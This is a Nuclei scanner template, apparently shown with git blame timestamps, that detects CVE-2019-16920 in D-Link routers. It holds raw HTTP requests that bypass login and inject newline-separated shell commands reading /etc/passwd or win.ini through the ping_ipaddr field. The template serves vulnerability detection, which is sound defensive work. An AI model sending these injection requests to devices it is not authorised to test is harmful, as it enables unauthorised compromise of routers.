nuclei-templates/cves/2019/CVE-2019-16920.yaml

58 lines
2.1 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-16920
2020-10-01 08:21:26 +00:00
info:
name: D-Link Routers - Remote Code Execution
2020-10-01 08:21:26 +00:00
author: dwisiswant0
severity: critical
description: D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
reference:
- https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r
- https://nvd.nist.gov/vuln/detail/CVE-2019-16920
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-16920
cwe-id: CWE-78
tags: cve,cve2019,dlink,rce
2020-10-01 08:21:26 +00:00
requests:
- raw:
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}
2020-10-01 08:21:26 +00:00
html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/login_pic.asp
2020-10-01 08:21:26 +00:00
Cookie: uid=1234123
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}}
- |
POST /apply_sec.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/login_pic.asp
2020-10-01 08:21:26 +00:00
Cookie: uid=1234123
html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}}
2020-10-01 08:21:26 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-10-01 08:21:26 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
2020-10-01 08:21:26 +00:00
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/16